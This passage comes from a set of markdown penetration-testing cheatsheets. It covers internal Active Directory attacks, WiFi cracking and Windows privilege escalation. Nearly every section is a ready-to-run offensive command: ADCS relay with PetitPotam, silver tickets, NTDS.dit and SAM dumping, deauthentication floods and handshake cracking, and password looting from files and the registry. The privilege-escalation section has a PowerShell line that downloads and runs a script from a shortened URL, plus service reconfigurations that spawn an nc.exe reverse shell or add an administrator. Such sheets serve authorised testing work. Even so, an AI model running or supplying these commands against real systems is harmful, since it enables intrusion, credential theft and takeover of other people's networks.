'{print $1"."$2"."$3".0/24"}' |sort -u > masscan_targets.ips 183 | masscan -iL masscan_targets.ips -p 21,22,23,80,443,445,5985,5986,8080,8443,5900 -oG masscan.grep 184 | 185 | ``` 186 | 187 | nmap on identified hosts 188 | 189 | ```bash 190 | nmap -sV --version-all -Pn -sT --top-ports 3000 -iL masscan.grep -oA all_hosts 191 | nmap --version-all -sV -sC -p- -oA allports 192 | ``` 193 | 194 | Search for low hanging fruits \(MS17 / default password TOMCAT VNC ... \) 195 | 196 | ```bash 197 | nmap -Pn -n -sSUV -n -vvv --reason -pT:137-139,445,U:137-139 --script=*ms17-010* -oA SMB_MS17 198 | use auxiliary/scanner/smb/smb_ms17_010 199 | use auxiliary/scanner/mssql/mssql_login 200 | use auxiliary/scanner/http/tomcat_mgr_login 201 | searchsploit 202 | ``` 203 | 204 | > For more details, see previous cheatsheet : [External Penetration Testing](../external/01-web-global.md) 205 | 206 | --- 207 | 208 | 209 | ## 3. **Unprivileged account only** 210 | 211 | 212 | ### Looking for coerced authentications 213 | 214 | 215 | 216 | **coerce list** 217 | 218 | ``` 219 | esc1 => abuse of a template-based vulnerability 220 | esc4 => abuse of a generic write (ACL) based vulnerability 221 | esc6 => abuse of vulnerability based on CA 222 | esc8 => relayx ntlm (attack can be played both with and without account) 223 | ``` 224 | 225 | **How to list all coerce of target** 226 | 227 | 228 | ``` 229 | git clone https://github.com/p0dalirius/Coercer.git 230 | cd Coercer && make 231 | ./Coercer.py -d '' -u '' -p '' --listener 232 | 233 | 234 | #OtherWay 235 | 236 | rpcdump.py DC02. 
| grep -A 6 MS-RPRN 237 | impacket-rpcdump | grep -A6 spool 238 | ``` 239 | 240 | **esc8** 241 | 242 | >If you don't know the IP of ADCS serveur, please use `certipy find /:@` 243 | 244 | ``` 245 | certipy relay -ca -template 'Domaincontroller' 246 | OR 247 | ntlmrelayx.py -t http:///certsrv/certfnsh.asp --smb2support --adcs 248 | 249 | And after 250 | 251 | PetitPotam -u '' -p '' -d 252 | 253 | Now we have .pfx, we can use it to get ticket service and nt hashs of computer account 254 | ``` 255 | 256 | 257 | **How to use pfx file** 258 | 259 | `certipy auth -pfx certif.pfx -dc-ip -username -domain ` 260 | 261 | This will give you .ccache file wich contain TGT and other certify will also show you a NT hash 262 | 263 | If you want to use the TGT with crackmapexec you can do it like this : 264 | 265 | `export KRB5CCNAME=administrator.ccache; cme smb DC01. -u 'administrator' -d -k` 266 | 267 | but you'll not be local administrator, but you can be using these commands which use dcsync: 268 | 269 | ``` 270 | export KRB5CCNAME=/workspace/administrator.ccache 271 | secretsdump -k -no-pass /'administrator$'@administrator. 
272 | ``` 273 | 274 | In case of secretsdump isn't working, we recommend you to create silver ticket( which is available only on the pwned machine and the pwned service ) 275 | 276 | 277 | **How to create silver ticket** 278 | 279 | 280 | ``` 281 | # Find the SID domain 282 | lookupsid.py -hashes 'LMhash:NThash' 'DOMAIN/DomainUser@DomainController' 0 283 | 284 | # with an NT hash 285 | python ticketer.py -nthash $NThash -domain-sid $DomainSID -domain $DOMAIN -spn $SPN $Username 286 | 287 | ``` 288 | 289 | you will get a service ticket, which allows you to root the machine then dump SAM and LSA ( also don't forget to use lsassy, you can have some good surprise) 290 | 291 | 292 | 293 | ### Get a shell 294 | 295 | > For more details, see next cheatsheets : [Shell](../useful-commands/shell.md) and [AV Bypass](09-antivirus-bypass) 296 | 297 | --- 298 | 299 | ### Local Privilege Escalation 300 | 301 | > For more details, see next cheatsheet : [Local Privilege Escalation Windows](03-lpe-windows.md) 302 | 303 | --- 304 | 305 | ### Domain Escalation 306 | 307 | > For more details, see next cheatsheet : [Domain Escalation](08-domain-escalation.md) 308 | 309 | --- 310 | 311 | ## 4. **Local Admin account** 312 | 313 | ### Post-Exploitation 314 | 315 | > For more details, see next cheatsheet : [Local Post Exploitation Windows](05-post-exploitation-windows.md) 316 | 317 | ### Pivoting 318 | 319 | > For more details, see next cheatsheet : [Pivoting](07-pivoting.md) 320 | 321 | ### Replay the secrets found 322 | 323 | Kerberos ticket, LM/NTLM hash or cleartext password with CrackMapExec or lsassy 324 | 325 | ```bash 326 | crackmapexec smb -d -u -H --lsa 327 | crackmapexec smb -d -u -H --sam 328 | crackmapexec smb -d -u -H -M lsassy 329 | lsassy -d -u -p 330 | ``` 331 | 332 | --- 333 | 334 | ## 5. 
**Domain admin account** 335 | 336 | ### Dump NTDS.dit from DC 337 | 338 | ```bash 339 | # CrackMapExec using password 340 | sudo crackmapexec smb -u -p '' --ntds 341 | 342 | # CrackMapExec using kerberos ticket 343 | export KRB5CCNAME=.ccache 344 | sudo crackmapexec smb --kerberos --ntds drsuapi 345 | 346 | # Antivirus blocking default drsuapi method, try vss method instead 347 | sudo crackmapexec smb -u -p '' --ntds vss 348 | 349 | # dump krbgt hash only 350 | impacket-secretsdump /:''@ -history -just-dc -just-user krbgt 351 | ``` 352 | 353 | ### Manual Dump 354 | 355 | ```bash 356 | # 1) use any tool that can achieve command execution on remote target to make a shadow copy 357 | vssadmin create shadow /for=C: 358 | copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\Windows\NTDS.dit.bak 359 | copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\Windows\SYSTEM.bak 360 | copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SECURITY C:\Windows\SECURITY.bak 361 | copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SAM C:\Windows\SAM.bak 362 | 363 | # 2) use any tool that can retrieve these 4 files 364 | smbmap -d -u -p -H --download-file 'C:\Windows\NTDS.dit.bak' 365 | smbmap -d -u -p -H --download-file 'C:\Windows\SYSTEM.bak' 366 | smbmap -d -u -p -H --download-file 'C:\Windows\SECURITY.bak' 367 | smbmap -d -u -p -H --download-file 'C:\Windows\SAM.bak' 368 | 369 | # 3) Locally parse theses files 370 | impacket-secretsdump -ntds NTDS.dit.bak -system SYSTEM.bak -security SECURITY.bak -sam SAM.bak LOCAL 371 | ``` 372 | 373 | -------------------------------------------------------------------------------- /Cheatsheets/internal/02-wifi.md: -------------------------------------------------------------------------------- 1 | # WIFI 2 | 3 | ## **WPA** 4 | 5 | 1. Capture Handshake using airodump-ng 6 | 2. Crack it locally using john or hashcat 7 | 8 | ### 1. 
Monitor mode 9 | 10 | ```sh 11 | sudo airmon-ng start wlan0 12 | ``` 13 | 14 | ### 2. Listen for specific bssid 15 | 16 | ```sh 17 | sudo airodump-ng -a mon0 18 | ``` 19 | 20 | > find you target bssid \(mac\) and chanel 21 | 22 | ```sh 23 | airodump-ng -c --bssid --showack -w capture mon0 24 | ``` 25 | 26 | > don't forget the -w paramter to save the handshake ! 27 | 28 | ### 3. DeAUTH 29 | 30 | ```sh 31 | # DEAUTH all clients from a box 32 | aireplay-ng mon0 -0 5 -b 33 | 34 | # DEAUTH specific client device 35 | aireplay-ng mon0 -0 5 -a -c 36 | 37 | 38 | # DEAUTH massif (each client connected at each bssid of an essid) 39 | for bssid in cat bssid_deauth.lst; do for mac in cat client_deauth.lst; do aireplay-ng mon.wlan0 -0 5 -a $bssid -c $mac --ignore-negative-one -e ; done ; done 40 | 41 | ``` 42 | 43 | ### 4. Handshake cracking 44 | 45 | Handshaked captured ? go crack it ! 46 | 47 | Crack with aircrack 48 | 49 | ```sh 50 | aircrack-ng capture-01.cap --wordlist= 51 | ``` 52 | 53 | Crack with john 54 | 55 | ```bash 56 | wpaclean capture.cap-01.clean.cap capture.cap-01.cap 57 | aircrack-ng capture.cap-01.clean.cap -J capture.cap-01.hccap 58 | hccap2john capture.cap-01.hccap > capture.cap-01.hccap.john 59 | john --wordlist= capture.cap-01.hccap.john 60 | ``` 61 | 62 | Crack with hashcat 63 | 64 | ```sh 65 | todo 66 | ``` 67 | 68 | --- 69 | 70 | ## **PEAP** 71 | 72 | 1. `sudo apt install hostapd-wpe` 73 | 2. Configure same channel and essid than the client's one in hostapd conf 74 | 3. Disconnect clients devices \(see WPA - 3. 
DeAUTH\) 75 | 76 | Log PEAP : hash client format john 77 | 78 | ```sh 79 | cat peap_client_log.txt | grep username -A2 | sed '/^--/d' | awk '{print $2}' | tr -d ':' | awk 'NR%3{printf $0":";next;}1' | awk -F ':' '{print $1"::::"$3":"$2}' 80 | ``` 81 | 82 | > Vulnerability fix : GPO validate certificate 83 | 84 | --- 85 | 86 | ## **Captive portal** 87 | 88 | ### DNS tunneling 89 | 90 | Try DNS tunneling to exfiltrate data over the internet 91 | 92 | - [http://requestbin.net/dns](http://requestbin.net/dns) 93 | 94 | - [dnscat2](https://github.com/iagox86/dnscat2) 95 | 96 | ```sh 97 | git clone https://github.com/iagox86/dnscat2.git 98 | cd dnscat2/server/ 99 | bundle install 100 | ``` 101 | 102 | ## Troubleshooting 103 | 104 | ### unblock wifi card 105 | 106 | ```bash 107 | sudo nmcli nm wifi off 108 | sudo nmcli radio wifi off 109 | sudo rfkill unblock wlan 110 | ``` 111 | 112 | --- 113 | 114 | ## **Todo** 115 | 116 | ### PEAP hash replay 117 | 118 | * Spoof AP and replay hashed captured 119 | * [Sensepost berate_ap](https://github.com/sensepost/berate_ap) 120 | * [Sensepost sycophant](https://github.com/sensepost/wpa_sycophant) 121 | 122 | ### dns2tcp manually 123 | 124 | création du tunel 125 | 126 | ```sh 127 | dns2tcpc -z dnstun.lexsi.net -c -d 1 -l 9000 -r ssh 192.168.128.27 -k _bijour@lexsi_ dns2tcpc -z dnstun.lexsi.net -c -d 1 -l 9000 -r ssh 192.168.1.29 -k Q5xTEGHgqa8 ssh rsshdummy@127.0.0.1 -p 9000 -D 9010 -N -i rssh\_dummy\_dv\_new 128 | ``` 129 | 130 | mise en place du proxy local 131 | 132 | ```sh 133 | ssh rssh@127.0.0.1 -p 9000 -D 9010 -N -i rssh.ssh 134 | ``` 135 | 136 | ### WPS 137 | 138 | ```bash 139 | airmon-ng check airmon-ng start wlan1 140 | wifite --showb --wpa --mon-iface wlan0mo 141 | airodump-ng -a wlan1mon --wps --essid-regex EDL time reaver -i wlan1mon -c 1 -b E8:FC:AF:9A:C9:B0 -K 1 142 | airodump-ng -a wlan1mon --essid-regex Internet 143 | wifite --showb --wpa --mon-iface wlan0mon --aircrack --pyrit --tshark --cowpatty --power 40 144 | 
airmon-ng check airmon-ng start wlan0 145 | airodump-ng wlan0mon --wps --essid-regex VICTIM reaver -i wlan0mon -c $channel -b $bssid -K 1 146 | ``` -------------------------------------------------------------------------------- /Cheatsheets/internal/03-lpe-windows.md: -------------------------------------------------------------------------------- 1 | # Priv-Esc Windows 2 | 3 | ## **Tools** 4 | 5 | DOTNET CSHARP 6 | 7 | * [SharpCollection](https://github.com/Flangvik/SharpCollection) (Flangvik collection of compiled WinPEAS, SeatBelt, SharpUP, etc.) 8 | * [winPEAS](https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS/winPEASexe) (Favorite so far) 9 | * [Seatbelt](https://github.com/GhostPack/Seatbelt) 10 | * [SharpUp](https://github.com/GhostPack/SharpUp) 11 | * [Rubeus](https://github.com/GhostPack/Rubeus) (Kerberos exploitation) 12 | * [Watson](https://github.com/rasta-mouse/Watson) (Kernel Exploitation) 13 | 14 | POWERSHELL 15 | 16 | * [JAWS](https://github.com/411Hall/JAWS) 17 | * [PowerSploit](https://github.com/PowerShellMafia/PowerSploit) (PowerUp) 18 | * [Sherlock](https://github.com/rasta-mouse/Sherlock) (Kernel Exploitation - Depreciated, now use Watson) 19 | * [WindowsEnum](https://github.com/absolomb/WindowsEnum) 20 | 21 | EXE CLASSIC 22 | 23 | * [Powerless](https://github.com/M4ximuss/Powerless) 24 | * [BeRoot](https://github.com/AlessandroZ/BeRoot) 25 | * [windows-privesc-check](https://github.com/pentestmonkey/windows-privesc-check) 26 | * [WindowsExploits](https://github.com/abatchy17/WindowsExploits) 27 | 28 | --- 29 | 30 | ## **Basic info** 31 | 32 | ### System enumeration 33 | 34 | OS name, arch, and version 35 | 36 | ```bat 37 | systeminfo | findstr /B /C:"OS Name" /C:"OS Version" 38 | 39 | wmic os get lastbootuptime 40 | wmic os get osarchitecture || echo %PROCESSOR_ARCHITECTURE% 41 | 42 | reg query "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\NET Framework Setup\NDP" 43 | 44 | hostname 45 | 
C:\WINDOWS\System32\drivers\etc\hosts 46 | ``` 47 | 48 | List all env variables 49 | 50 | ```bat 51 | Get-ChildItem Env: | ft Key,Value 52 | ``` 53 | 54 | Find Writeable Folder 55 | 56 | ```bat 57 | echo %temp% 58 | echo %tmp% 59 | ``` 60 | 61 | List all drives 62 | 63 | ```bat 64 | wmic logicaldisk get caption || fsutil fsinfo drives 65 | wmic logicaldisk get caption,description,providername 66 | 67 | Get-PSDrive | where {$_.Provider -like "Microsoft.PowerShell.Core\FileSystem"}| ft Name,Root 68 | ``` 69 | 70 | --- 71 | 72 | ### User enumeration 73 | 74 | Get current username 75 | 76 | ```bat 77 | echo %USERNAME% || whoami 78 | $env:username 79 | ``` 80 | 81 | List user privilege 82 | 83 | ```bat 84 | whoami /priv 85 | whoami /groups 86 | ``` 87 | 88 | List all users 89 | 90 | ```bat 91 | qwinsta (can be run on remote `qwinsta [/server:]`) 92 | net user 93 | whoami /all 94 | 95 | Get-LocalUser | ft Name,Enabled,LastLogon 96 | Get-ChildItem C:\Users -Force | select Name 97 | ``` 98 | 99 | List logon requirements; useable for bruteforcing 100 | 101 | ```bat 102 | net accounts 103 | ``` 104 | 105 | Get details about a user \(i.e. administrator, admin, current user\) 106 | 107 | ```bat 108 | net user administrator 109 | net user admin 110 | net user %USERNAME% 111 | ``` 112 | 113 | List all local groups 114 | 115 | ```bat 116 | net localgroup 117 | 118 | Get-LocalGroup | ft Name 119 | ``` 120 | 121 | Get details about a group \(i.e. administrators\) 122 | 123 | ```bat 124 | net localgroup administrators 125 | 126 | Get-LocalGroupMember Administrators | ft Name, PrincipalSource 127 | Get-LocalGroupMember Administrateurs | ft Name, PrincipalSource 128 | 129 | ``` 130 | 131 | --- 132 | 133 | ### Network enumeration 134 | 135 | List all network interfaces, IP, and DNS. 
136 | 137 | ```bat 138 | ipconfig /all 139 | 140 | Get-NetIPConfiguration | ft InterfaceAlias,InterfaceDescription,IPv4Address 141 | Get-DnsClientServerAddress -AddressFamily IPv4 | ft 142 | ``` 143 | 144 | List current routing table 145 | 146 | ```bat 147 | route print 148 | 149 | Get-NetRoute -AddressFamily IPv4 | ft DestinationPrefix,NextHop,RouteMetric,ifIndex 150 | ``` 151 | 152 | List the ARP table 153 | 154 | ```bat 155 | arp -A 156 | 157 | Get-NetNeighbor -AddressFamily IPv4 | ft ifIndex,IPAddress,LinkLayerAddress,State 158 | ``` 159 | 160 | List all current connections 161 | 162 | ```bat 163 | netstat -ano 164 | ``` 165 | 166 | List firewall state and current configuration 167 | 168 | ```bat 169 | netsh advfirewall firewall dump 170 | 171 | netsh advfirewall firewall show rule name=all 172 | netsh advfirewall export "firewall.txt" 173 | 174 | netsh firewall show state 175 | netsh firewall show config 176 | ``` 177 | 178 | List firewall's blocked ports 179 | 180 | ```bat 181 | $f=New-object -comObject HNetCfg.FwPolicy2;$f.rules | where {$_.action -eq "0"} | select name,applicationname,localports 182 | ``` 183 | 184 | Disable firewall 185 | 186 | ```bat 187 | netsh firewall set opmode disable 188 | netsh advfirewall set allprofiles state off 189 | ``` 190 | 191 | List all network shares 192 | 193 | ```bat 194 | net share 195 | ``` 196 | 197 | SNMP Configuration 198 | 199 | ```bat 200 | reg query HKLM\SYSTEM\CurrentControlSet\Services\SNMP /s 201 | Get-ChildItem -path HKLM:\SYSTEM\CurrentControlSet\Services\SNMP -Recurse 202 | ``` 203 | 204 | --- 205 | 206 | ## **Password looting** 207 | 208 | ### Tools 209 | 210 | ```bat 211 | - Seatbelt.exe 212 | 213 | - PowerSploit 214 | Get-CachedGPPPassword //For locally stored GP Files 215 | Get-GPPPassword //For GP Files stored in the DC 216 | Get-UnattendedInstallFile 217 | Get-Webconfig 218 | Get-ApplicationHost 219 | Get-SiteListPassword 220 | Get-RegistryAutoLogon 221 | 222 | - msf 223 | 
post/windows/gather/credentials/gpp 224 | ``` 225 | 226 | ### Group Policy Preferences 227 | 228 | ```bat 229 | dir C:\ProgramData\Microsoft\Group Policy\History\\Machine\Preferences\Groups\Groups.xml 230 | dir \\\SYSVOL\\Policies\\MACHINE\Preferences\Groups\Groups.xml 231 | 232 | Services\Services.xml 233 | ScheduledTasks\ScheduledTasks.xml 234 | Printers\Printers.xml 235 | Drives\Drives.xml 236 | DataSources\DataSources.xml 237 | ``` 238 | 239 | ### Unattended Install files 240 | 241 | ```bat 242 | dir /s *sysprep.inf *sysprep.xml *unattended.xml *unattend.xml *unattend.txt 2>nul 243 | 244 | Get-Childitem –Path C:\ -Include *unattend*,*sysprep* -File -Recurse -ErrorAction SilentlyContinue | where {($_.Name -like "*.xml" -or $_.Name -like "*.txt" -or $_.Name -like "*.ini")} 245 | 246 | C:\Windows\Panther\Unattend.xml 247 | C:\Windows\Panther\Unattended.xml 248 | C:\Windows\Panther\Unattend\Unattended.xml 249 | C:\Windows\Panther\Unattend\Unattend.xml 250 | C:\Windows\System32\Sysprep\unattend.xml 251 | C:\Windows\System32\Sysprep\Panther\unattend.xml 252 | ``` 253 | 254 | ### Credential manager 255 | 256 | ```bat 257 | cmdkey /list 258 | dir C:\Users\username\AppData\Local\Microsoft\Credentials\ 259 | dir C:\Users\username\AppData\Roaming\Microsoft\Credentials\ 260 | 261 | Get-ChildItem -Hidden C:\Users\username\AppData\Local\Microsoft\Credentials\ 262 | Get-ChildItem -Hidden C:\Users\username\AppData\Roaming\Microsoft\Credentials\ 263 | ``` 264 | 265 | ### In file name 266 | 267 | ```bat 268 | dir /S /B *pass*.txt == *pass*.xml == *pass*.ini == *cred* == *vnc* == *.config* 269 | where /R C:\ user.txt 270 | where /R C:\ *.ini 271 | 272 | Get-ChildItem C:\* -include *.xml,*.ini,*.txt,*.config -Recurse -ErrorAction SilentlyContinue | Select-String -Pattern "password" 273 | ``` 274 | 275 | ### In file content 276 | 277 | ```bat 278 | cd C:\ & findstr /SI /M "password" *.xml *.ini *.txt 279 | findstr /si password *.xml *.ini *.txt *.config 2>nul 280 | findstr /spin 
"password" *.* 2>nul 281 | dir /s *pass* == *vnc* == *.config* 2>nul (lot of output) 282 | 283 | Get-Childitem –Path C:\Users\ -Include *password*,*vnc*,*.config -File -Recurse -ErrorAction SilentlyContinue 284 | Get-Childitem –Path C:\inetpub\ -Include web.config -File -Recurse -ErrorAction SilentlyContinue 285 | 286 | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Config\web.config 287 | C:\inetpub\wwwroot\web.config 288 | ``` 289 | 290 | ### In registry 291 | 292 | ```bat 293 | REG QUERY HKLM /F "password" /t REG_SZ /S /K 294 | REG QUERY HKCU /F "password" /t REG_SZ /S /K 295 | reg query HKLM /f password /t REG_SZ /s 296 | reg query HKCU /f password /t REG_SZ /s 297 | 298 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" # Windows Autologin 299 | reg query "HKLM\SOFTWARE\Microsoft\Windows NT\Currentversion\Winlogon" 2>nul | findstr "DefaultUserName DefaultDomainName DefaultPassword" 300 | reg query "HKLM\SYSTEM\Current\ControlSet\Services\SNMP" # SNMP parameters 301 | reg query "HKCU\Software\SimonTatham\PuTTY\Sessions" # Putty clear text proxy credentials 302 | reg query "HKCU\Software\ORL\WinVNC3\Password" # VNC credentials 303 | reg query HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4 /v password 304 | 305 | 306 | REG QUERY "HKLM\Software\Microsoft\FTH" /V RuleList 307 | 308 | Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinLogon' | select "Default*" 309 | ``` 310 | 311 | ### In services 312 | 313 | ```bat 314 | https://raw.githubusercontent.com/Arvanaghi/SessionGopher/master/SessionGopher.ps1 315 | Import-Module \SessionGopher.ps1; 316 | Invoke-SessionGopher -AllDomain -o 317 | Invoke-SessionGopher -AllDomain -u domain.com\adm-arvanaghi -p s3cr3tP@ss 318 | ``` 319 | > Full path is mandatory for Import-Module 320 | 321 | ### in Powershell history 322 | 323 | ```bat 324 | type %userprofile%\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 325 | type 
C:\Users\\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadline\ConsoleHost_history.txt 326 | type $env:APPDATA\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt 327 | 328 | cat (Get-PSReadlineOption).HistorySavePath 329 | cat (Get-PSReadlineOption).HistorySavePath | sls passw 330 | ``` 331 | 332 | --- 333 | 334 | ## **Services** 335 | 336 | ### Tools 337 | 338 | ```bat 339 | - SeatBelt.exe 340 | 341 | - SharpUp.exe 342 | 343 | - PowerSploit 344 | Get-ServiceDetail 345 | Get-ModifiableService | more 346 | Get-ModifiableServiceFile | more 347 | Write-ServiceBinary 348 | 349 | - PowerUp 350 | powershell.exe -exec bypass -Command "& {Import-Module .\PowerUp.ps1; Invoke-AllChecks}" 351 | powershell -nop -exec bypass -c "IEX (New-Object Net.WebClient).DownloadString('http://bit.ly/DFgdfez'); Invoke-AllChecks" 352 | Invoke-ServiceAbuse -Name -Username 353 | ``` 354 | 355 | ### Manual exploit Binary Path 356 | 357 | Change binary path name 358 | 359 | ```bash 360 | sc config "snmptrap" binPath= "net localgroup administrators /add" 361 | ``` 362 | 363 | > Tested on Windows XP SP1 364 | 365 | ```bat 366 | sc qc upnphost 367 | sc config SSDPSRV start= auto 368 | net start SSDPSRV 369 | sc config upnphost binpath= "C:\nc.exe -nv [ip] [port] -e C:\WINDOWS\System32\cmd.exe" 370 | sc config upnphost obj= ".\LocalSystem" password= "" 371 | sc qc upnphost 372 | net start upnphost 373 | ``` 374 | 375 | ### Unquoted Service Paths 376 | 377 | ```bat 378 | # Using PowerSploit 379 | Get-ServiceUnquoted 380 | Write-ServiceBinary -Name "GDCAgent' -Path "C:\GDCAgent.exe" 381 | 382 | # Using WMIC 383 | wmic service get name,displayname,pathname,startmode |findstr /i "auto" |findstr /i /v "c:\windows\\" |findstr /i /v """ 384 | wmic service get name,displayname,startmode,pathname | findstr /i /v "C:\Windows\\" |findstr /i /v """ 385 | gwmi -class Win32_Service -Property Name, DisplayName, PathName, StartMode | Where {$_.StartMode -eq "Auto" -and $_.PathName -notlike 
"C:\Windows*" -and $_.PathName -notlike '"*'} | select PathName,DisplayName,Name 386 | 387 | # Using sc 388 | sc query 389 | sc qc service name 390 | 391 | # Look for Binary_path_name and see if it is unquoted. 392 | 393 | # Metasploit 394 | exploit/windows/local/trusted_service_path 395 | # PowerSploit 396 | SharpUp PowerUp 397 | ``` 398 | 399 | ### AlwaysInstallElevated 400 | 401 | ```bat 402 | # manual cmd 403 | reg query HKCU\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 404 | reg query HKLM\SOFTWARE\Policies\Microsoft\Windows\Installer /v AlwaysInstallElevated 405 | 406 | # PowerSploit 407 | Import-Module Privesc 408 | Get-RegistryAlwaysInstallElevated 409 | Write-UserAddMSI 410 | ``` 411 | 412 | ### What is running 413 | 414 | ```bat 415 | tasklist /v 416 | tasklist /v /fi "username eq system" 417 | tasklist /SVC 418 | wmic service list brief 419 | net start 420 | sc query 421 | Get-Service 422 | Get-Process 423 | Get-WmiObject -Query "Select * from Win32_Process" | where {$_.Name -notlike "svchost*"} | Select Name, Handle, @{Label="Owner";Expression={$_.GetOwner().User}} | ft -AutoSize 424 | ``` 425 | 426 | ### Scheduled task 427 | 428 | ```bat 429 | sc qc 430 | schtasks /query /fo LIST /v /s 431 | schtasks /query /fo LIST 2>nul | findstr TaskName 432 | schtasks /query /fo LIST /v > schtasks.txt; cat schtask.txt | grep "SYSTEM\|Task To Run" | grep -B 1 SYSTEM 433 | dir C:\windows\tasks 434 | 435 | Get-ScheduledTask | where {$_.TaskPath -notlike "\Microsoft*"} | ft TaskName,TaskPath,State 436 | ``` 437 | 438 | ### Startup services 439 | 440 | ```bat 441 | wmic startup get caption,command 442 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\R 443 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Run 444 | reg query HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce 445 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\Run 446 | reg query HKCU\Software\Microsoft\Windows\CurrentVersion\RunOnce 447 | dir 
"C:\Documents and Settings\All Users\Start Menu\Programs\Startup" 448 | dir "C:\Documents and Settings\%username%\Start Menu\Programs\Startup" 449 | 450 | Get-CimInstance Win32_StartupCommand | select Name, command, Location, User | fl 451 | Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run' 452 | Get-ItemProperty -Path 'Registry::HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\RunOnce' 453 | Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run' 454 | Get-ItemProperty -Path 'Registry::HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\RunOnce' 455 | Get-ChildItem "C:\Users\All Users\Start Menu\Programs\Startup" 456 | Get-ChildItem "C:\Users\$env:USERNAME\Start Menu\Programs\Startup 457 | ``` 458 | 459 | ### Permissions 460 | 461 | ```bat 462 | dir /a "C:\Program Files" 463 | dir /a "C:\Program Files (x86)" 464 | reg query HKEY_LOCAL_MACHINE\SOFTWARE 465 | 466 | Get-ChildItem 'C:\Program Files', 'C:\Program Files (x86)' | ft Parent,Name,LastWriteTime 467 | Get-ChildItem -path Registry::HKEY_LOCAL_MACHINE\SOFTWARE | ft Name 468 | 469 | icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "Everyone" 470 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "Everyone" 471 | icacls "C:\Program Files\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" 472 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(F)" | findstr "BUILTIN\Users" 473 | 474 | icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "Everyone" 475 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "Everyone" 476 | icacls "C:\Program Files\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" 477 | icacls "C:\Program Files (x86)\*" 2>nul | findstr "(M)" | findstr "BUILTIN\Users" 478 | 479 | cacls "c:\Program Files" /T | findstr Users 480 | 481 | accesschk.exe -uwcqv "Everyone" * -accepteula 482 | accesschk.exe -uwcqv "Authenticated Users" * 483 | 
accesschk.exe -uwcqv "Users" * 484 | accesschk.exe -ucqv * 485 | accesschk.exe -ucqv Spooler 486 | 487 | # Applocker exe bypass 488 | icacls.exe C:\Windows\Tasks 489 | 490 | # Applocker dll bypass 491 | accesschk.exe "" C:\Windows -wus 492 | 493 | ``` 494 | > For Windows XP and 2003, use an older version of accesschk : 495 | 496 | - [Accesschk-2003-xp.exe](https://github.com/ankh2054/windows-pentest/raw/master/Privelege/accesschk-2003-xp.exe) 497 | 498 | Interesting permissions to get shell 499 | 500 | ```bat 501 | SERVICE_ALL_ACCESS (full access) 502 | SERVICE_CHANGE_CONFIG (reconfigure binary) 503 | WRITE_DAC (reconfigure permissions) 504 | WRITE_OWNER (become owner, change permission) 505 | GENERIC_WRITE (inherits SERVICE_CHANGE_CONFIG) 506 | GENEROC_ALL (inherits SERVICE_CHANGE_CONFIG) 507 | ``` 508 | 509 | --- 510 | 511 | ## **Kernel Exploitation** 512 | 513 | ### Tools 514 | 515 | ```bat 516 | - msf 517 | post/windows/gather/enum_patches 518 | 519 | - https://github.com/rasta-mouse/Watson 520 | - https://github.com/rasta-mouse/Sherlock 521 | Find-AllVulns 522 | 523 | - https://github.com/SecWiki/windows-kernel-exploits 524 | - https://github.com/GDSSecurity/Windows-Exploit-Suggester 525 | ``` 526 | 527 | ### Manual discovery 528 | 529 | ```bat 530 | wmic qfe 531 | wmic qfe get Caption,Description,HotFixID,InstalledOn 532 | wmic qfe get Caption,Description,HotFixID,InstalledOn | findstr /C:"KB.." /C:"KB.." 533 | ``` 534 | 535 | --- 536 | 537 | ## **Insecure GUI apps** 538 | 539 | Application running as SYSTEM allowing an user to spawn a CMD, or browse directories. 
Example: "Windows Help and Support" (Windows + F1), search for "command prompt", click on "Click to open Command Prompt"

---

## **Abusing privileges**

- [Priv2Admin](https://github.com/gtworek/Priv2Admin) : primary token checklist
- [FullPowers](https://github.com/itm4n/FullPowers) : enable all privileges for a service or network account

### Hot potato

- [https://foxglovesecurity.com/2016/01/16/hot-potato/](https://foxglovesecurity.com/2016/01/16/hot-potato/)

exe : [Potato.exe](https://github.com/foxglovesec/Potato)

```bat
Potato.exe -ip -cmd [cmd to run] -disable_exhaust true -disable_defender true
```

powershell : [Tater.ps1](https://github.com/Kevin-Robertson/Tater)

```bat
Invoke-Tater -Command "net localgroup administrators user /add"
```

### RottenPotato

**Token Impersonation**

- [RottenPotato](https://github.com/foxglovesec/RottenPotato)
- [RottenPotatoNG](https://github.com/breenmachine/RottenPotatoNG)

Incognito (Meterpreter)

```bat
getuid
getprivs
use incognito
list_tokens -u
cd c:\temp\
execute -Hc -f ./rot.exe
impersonate_token "NT AUTHORITY\SYSTEM"
```

TokenManipulation

```bat
Invoke-TokenManipulation -Enumerate
